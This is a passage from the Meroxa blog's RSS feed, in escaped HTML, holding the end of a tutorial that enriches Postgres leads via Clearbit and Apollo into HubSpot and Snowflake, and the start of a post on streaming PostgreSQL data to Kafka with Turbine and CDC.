    console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;[processData] domainName via:&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; domainName&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;domainName &lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt; domainName&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;length &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;[processData] [WARN] Could not get domainName via getDomainNameFromClearbit. domainName: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;domainName&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;people&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;Could not get domainName via getDomainNameFromClearbit. domainName: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;domainName&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Call Apollo search API to get contact information on the CTO and VP of Engineering roles&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; contacts &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;getContactsFromApollo&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;domainName&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;VP of Engineering&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;CTO&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;contacts &lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt; contacts&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;length &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;[processData] [WARN] Could not get contacts via getContactsFromApollo. contacts: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;contacts&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;people&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;Could not get contacts via getContactsFromApollo. contacts: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;contacts&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

    contacts&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;forEach&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;contact&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token comment&quot;&gt;// Generate a Contact object using data from Apollo&lt;/span&gt;
      &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; contactData &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;_generateContactDataForHubspot&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;contact&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;[processData] contactData for createHubspotContact:&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; contactData&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

      &lt;span class=&quot;token comment&quot;&gt;// Add a new contact column to the Postgres record, which we will write to Snowflake&lt;/span&gt;
      record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;contact&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;contactData&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

      &lt;span class=&quot;token comment&quot;&gt;// Create a HubSpot Contact&lt;/span&gt;
      &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; contactId &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;createHubspotContact&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;contactData&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;[processData] contactId for addHubspotContactToList:&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; contactId&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

      &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;contactId &lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt; contactId&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;length &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;[processData] [WARN] Could not get contactId via createHubspotContact. contactId:&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; contactId&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

      &lt;span class=&quot;token comment&quot;&gt;// Add each contact we created to a specific HubSpot list&lt;/span&gt;
      &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;addHubspotContactToList&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;contactId&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;381&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;// Return the modified Postgres records to write to Snowflake&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; records&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Deploying Your App&lt;/p&gt;
&lt;p&gt;Commit your changes&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;add&lt;/span&gt; &lt;span class=&quot;token builtin class-name&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; commit &lt;span class=&quot;token parameter variable&quot;&gt;-m&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Initial Commit&quot;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Deploy your app&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps deploy  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Once your app is deployed, you will see that your HubSpot account has all the contacts for companies in your PostgreSQL DB table, and they will be added to the list you specify in the &lt;code class=&quot;language-text&quot;&gt;addHubspotContactToList&lt;/code&gt; function. If you opted into moving your data into Snowflake, you will see the enriched data populate in the &lt;code class=&quot;language-text&quot;&gt;leads_from_pg&lt;/code&gt; table and in your &lt;code class=&quot;language-text&quot;&gt;leads_from_pg_topic&lt;/code&gt; for Kafka. As records come into your data source (PostgreSQL in this example), your Turbine app running on the Meroxa platform will process each record.&lt;/p&gt;
&lt;p&gt;Meroxa will set up all the connections and remove the complexities, so you, the developer, can focus on the important stuff.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Have questions or feedback?&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;If you have questions or feedback, reach out directly by joining our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;community&lt;/a&gt; or by writing to &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Happy Coding 🚀&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Real-Time Data Streaming from PostgreSQL to Apache Kafka in 4 Lines of Code w/ CDC]]></title><description><![CDATA[Stream data from PostgreSQL to Apache Kafka using four lines of code with change data capture.]]></description><link>https://meroxa.com/blog/real-time-data-streaming-from-postgresql-to-kafka-4-lines-of-code-w/-cdc</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-data-streaming-from-postgresql-to-kafka-4-lines-of-code-w/-cdc</guid><dc:creator><![CDATA[Tanveet Gill]]></dc:creator><pubDate>Tue, 08 Nov 2022 21:36:35 GMT</pubDate><content:encoded>&lt;p&gt;Writing data into Apache Kafka can become a tedious task for any data developer. If you’ve ever had a situation where your applications insert data in real-time to your database and you want to take actions on that data by moving it into a Kafka Topic, then Meroxa can help you do that in a few lines of code.&lt;/p&gt;
&lt;h2&gt;Overview&lt;/h2&gt;
&lt;p&gt;Here we will show an example of multiple applications inserting data into a PostgreSQL database, where we then use Meroxa to stream that data over to a Kafka Topic instantly as records get inserted.&lt;/p&gt;
&lt;p&gt;Below we can see how data flows from your &lt;code class=&quot;language-text&quot;&gt;Applications&lt;/code&gt; to &lt;code class=&quot;language-text&quot;&gt;PostgreSql&lt;/code&gt; and then where &lt;code class=&quot;language-text&quot;&gt;Meroxa&lt;/code&gt; comes in to stream it in real-time to your &lt;code class=&quot;language-text&quot;&gt;Kafka Topic&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Flowcharts.png&quot; alt=&quot;Flowcharts&quot;&gt;&lt;/p&gt;
&lt;h2&gt;Take Me To The Code!&lt;/h2&gt;
&lt;p&gt;In this example, we will use the &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/javascript&quot;&gt;Javascript Turbine framework&lt;/a&gt; to get records from PostgreSQL and write them to your Kafka Topic.&lt;/p&gt;
&lt;p&gt;💡 If you prefer to use another language, Meroxa supports &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/go/&quot;&gt;Go&lt;/a&gt;, &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/python/&quot;&gt;Python&lt;/a&gt;, and &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/ruby&quot;&gt;Ruby&lt;/a&gt; as well with many more coming!&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Requirements&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&amp;#x26;_ga=2.195716328.574921592.1659337186-1213117309.1659337186&quot;&gt;Meroxa account&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup/&quot;&gt;Meroxa supported PostgreSQL DB&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://meroxa.com/blog/new-integration-resources-apache-kafka-and-confluent-cloud&quot;&gt;Apache Kafka/Confluent Cloud Credentials&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://nodejs.org/en/&quot;&gt;Node JS&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Once you have signed up for &lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&amp;#x26;_ga=2.195716328.574921592.1659337186-1213117309.1659337186&quot;&gt;Meroxa&lt;/a&gt; and set up the &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt; you can follow the following steps to get up and running:&lt;/p&gt;
&lt;p&gt;💡 Here we are creating the resources via the CLI, you can also do so via the &lt;a href=&quot;https://dashboard.meroxa.io/resources&quot;&gt;Meroxa Dashboard&lt;/a&gt; once you are logged in.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Adding your PostgreSQL and Kafka Topic Resources&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;PostgreSQL&lt;/strong&gt; (&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup/&quot;&gt;Guide on configuring your Postgres&lt;/a&gt;) - Source Resource&lt;/p&gt;
&lt;p&gt;Below we are creating a PostgreSQL connection to Meroxa named &lt;code class=&quot;language-text&quot;&gt;pg_db&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Note: To support CDC (Change Data Capture) we turn on the &lt;code class=&quot;language-text&quot;&gt;logical_replication&lt;/code&gt; flag.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create pg_db &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;  --type postgres \\\\
  --url postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB \\\\
  --metadata &apos;{&quot;logical_replication&quot;:&quot;true&quot;}&apos;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Kafka&lt;/strong&gt; (&lt;a href=&quot;https://meroxa.com/blog/new-integration-resources-apache-kafka-and-confluent-cloud&quot;&gt;Guide on setting up Confluent Cloud/Kafka&lt;/a&gt;) - Destination Resource&lt;/p&gt;
&lt;p&gt;Below we are creating a Kafka connection named &lt;code class=&quot;language-text&quot;&gt;apachekafka&lt;/code&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create apachekafka &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;    &lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; kafka &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;    &lt;span class=&quot;token parameter variable&quot;&gt;--url&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;kafka+sasl+ssl://&amp;lt;USERNAME&gt;:&amp;lt;PASSWORD&gt;@&amp;lt;BOOTSTRAP_SERVER&gt;?sasl_mechanism=plain&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Initializing Turbine&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps init meroxa-kafka &lt;span class=&quot;token parameter variable&quot;&gt;--lang&lt;/span&gt; js  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Writing The 4 Lines Of Code&lt;/p&gt;
&lt;p&gt;Open up your &lt;code class=&quot;language-text&quot;&gt;meroxa-kafka&lt;/code&gt; folder in your preferred IDE. You will get boilerplate code that explains where to code your sources and destinations named in Step 1. In our case we just need to do the following:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;exports&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;App &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;App&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;turbine&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token comment&quot;&gt;// First, identify your PostgreSQL source name as configured in Step 1&lt;/span&gt;
    &lt;span class=&quot;token comment&quot;&gt;// In our case we named it pg_db&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;pg_db&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Second, specify the table you want to access in your PostgreSQL DB&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;customer_data_table&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Optional, Process each record that comes in!&lt;/span&gt;
    &lt;span class=&quot;token comment&quot;&gt;// let transformed = await turbine.process(records, this.transform);&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Third, identify your Kafka/Confluent source name configured in Step 1&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; destination &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;apachekafka&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Finally, specify which Topic to write that data to&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destination&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;customer_data_topic&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
